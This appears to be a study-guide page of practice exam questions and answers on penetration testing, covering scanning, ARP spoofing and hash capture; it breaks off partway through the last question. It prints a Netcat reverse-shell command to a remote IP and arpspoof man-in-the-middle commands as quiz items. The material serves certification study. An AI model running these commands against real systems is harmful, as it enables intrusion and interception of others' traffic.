
Sybex Study Guide PQs 2022 with complete solution

Nursing Exams Nov 4, 2025

Liam executes the following command on a compromised system: nc 10.1.10.1 7337 -e /bin/sh What has he done?

  • Started a reverse shell using Netcat
  • Captured traffic on the Ethernet port to the console via Netcat
  • Set up a bind shell using Netcat
  • None of the above

-Answer- A. Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell.

Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

  • ARP spoofing
  • IP proofing
  • DHCP pirating
  • Spoofmastering

-Answer- A. ARP spoofing attacks rely on responding to a system's ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker's system can then act as a man in the middle.

Which one of the following is NOT a reason to conduct periodic penetration tests of systems and applications?

  • Changes in the environment
  • Cost
  • Evolving threats
  • New team members

-Answer- B. Repeating penetration tests periodically does not provide cost benefits to the organization. In fact, it incurs costs. However, penetration tests should be repeated because they can detect issues that arise due to changes in the tested environment and the evolving threat landscape. The use of new team members also increases the independence and value of subsequent tests.

Beth recently conducted a phishing attack against a penetration testing target in an attempt to gather credentials that she might use in later attacks. What stage of the penetration testing process is Beth in?

  • Planning and Scoping
  • Attacking and Exploiting
  • Information Gathering and Vulnerability Identification
  • Reporting and Communication Results

-Answer- B. While Beth is indeed gathering information during a phishing attack, she is conducting an active social engineering attack. This moves beyond the activities of Information Gathering and Vulnerability Identification and moves into the realm of Attacking and Exploiting.

Which one of the following security assessment tools is not commonly used during the Information Gathering and Vulnerability Identification phase of a penetration test?

  • Nmap
  • Nessus
  • Metasploit
  • Nslookup

-Answer- C. Nmap is a port scanning tool used to enumerate open network ports on a system. Nessus is a vulnerability scanner designed to detect security issues on a system. Nslookup is a DNS information gathering utility. All three of these tools may be used to gather information and detect vulnerabilities. Metasploit is an exploitation framework used to execute an attack and would be better suited for the Attacking and Exploiting phase of a penetration test.

During a penetration test, Alex discovers that he is unable to scan a server that he was able to successfully scan earlier in the day from the same IP address. What has most likely happened?

  • His IP address was whitelisted.
  • The server crashed.
  • The network is down.
  • His IP address was blacklisted.

-Answer- D. The IP address or network that Alex is sending his traffic from was most likely blacklisted as part of the target organization's defensive practices. A whitelist would allow him in, and it is far less likely that the server or network has gone down.

What type of penetration test is not aimed at identifying as many vulnerabilities as possible and instead focuses on vulnerabilities that specifically align with the goals of gaining control of specific systems or data?

  • An objectives-based assessment
  • A compliance-based assessment
  • A black-team assessment
  • A red-team assessment

-Answer- D. A red-team assessment is intended to simulate an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find.

After running an SNMP sweep, Greg finds that he didn't receive any results. If he knows there are no network protection devices in place and that there are devices that should respond to SNMP queries, what problem does he most likely have?

  • The SNMP private string is set.
  • There is an incorrect community string.
  • SNMP only works on port 25.
  • SNMP sweeps require the network to support broadcast traffic.

-Answer- B. Most modern SNMP deployments use a non-default community string. If Greg does not have the correct community string, he will not receive the information he is looking for. If port 25 looked like an attractive answer, you're likely thinking of SMTP. Having an SNMP private string set will not stop Greg's query if he has the proper community string, but not having the right community string will!

What does a result of * * * mean during a traceroute?

  • No route to host.
  • All hosts queried.
  • No response to the query, perhaps a timeout, but traffic is going through.
  • A firewall is blocking responses.

-Answer- C. A series of three asterisks during a traceroute means that the host query has failed but traffic is passing through. Many hosts are configured to not respond to this type of traffic but will route traffic properly.

Rick wants to look at the advertised routes to his target. What type of service should he look for to do this?

  • A BGP looking glass
  • A RIP-off
  • An IGRP relay
  • A BGP tunnel

-Answer- A. BGP looking glasses are publicly available services that allow for route inspection. Rick should find a BGP looking glass service and query the routes for his target.

Elaine wants to ensure that the limitations of her red-team penetration test are fully explained. Which of the following are valid disclaimers for her agreement? (Choose two.)

  • Risk Tolerance
  • Point-in-time
  • Comprehensiveness
  • Impact Tolerance

-Answer- BC. Both the comprehensiveness of the test and the limitation that it is only relevant at the point in time it is conducted are appropriate disclaimers for Elaine to include. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

Gary is conducting a black box penetration test against an organization and is gathering vulnerability scanning results for use in his tests. Which one of the following scans is most likely to provide him with helpful information within the bounds of his test?

  • Stealth internal scan
  • Full internal scan
  • Stealth external scan
  • Full external scan

-Answer- D. A full scan is likely to provide more useful and actionable results because it includes more tests. There is no requirement in the scenario that Gary avoid detection, so a stealth scan is not necessary. However, this is a black box test, so it would not be appropriate for Gary to have access to scans conducted on the internal network.

Which one of the following technologies, when used within an organization, is the LEAST likely to interfere with vulnerability scanning results achieved by external penetration testers?

  • Encryption
  • Firewall
  • Containerization
  • Intrusion prevention system

-Answer- A. Encryption technology is unlikely to have any effect on the results of vulnerability scans because it does not change the services exposed by a system. Firewalls and intrusion prevention systems may block inbound scanning traffic before it reaches target systems. Containerized and virtualized environments may prevent external scanners from seeing services exposed within the containerized or virtualized environment.

Ken is planning to conduct a vulnerability scan of an organization as part of a penetration test. He is conducting a black box test. When would it be appropriate to conduct an internal scan of the network?

  • During the planning stage of the test
  • As soon as the contract is signed
  • After receiving permission from an administrator
  • After compromising an internal host

-Answer- D. Because this is a black box scan, Ken should not (and most likely cannot) conduct an internal scan until he first compromises an internal host. Once he gains this foothold on the network, he can use that compromised system as the launching point for internal scans.

Once Chris has gained access to the network, what technique can he use to gather additional credentials?

  • ARP spoofing to become a man in the middle
  • Network sniffing using Wireshark
  • SYN floods
  • All of the above

-Answer- A. Chris can use ARP spoofing to represent his workstation as a legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can act as a man in the middle. Network sniffing is useful after this to read traffic, but it isn't useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials, thus both options C and D are incorrect.

Which of the following tools will not allow Alice to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack?

  • Responder
  • Mimikatz
  • Ettercap
  • Metasploit

-Answer- B. Unlike the other options listed here, Mimikatz pulls hashes from the lsass process. Since the question specifically notes "over the wire," Mimikatz is the only tool that cannot be used for that.

Ron wants to use arpspoof to execute a man-in-the-middle attack between target host 10.0.1.5 and a server at 10.0.1.25, with a network gateway of 10.0.1.1. What commands does he need to run to do this? (Choose two.)

  • arpspoof -i eth0 -t 10.0.1.5 -r 10.0.1.25
  • arpspoof -i eth0 -t 10.0.1.5 -r 10.0.1.1
  • arpspoof -i eth0 -t 255.255.255.255 -r 10.0.1.25
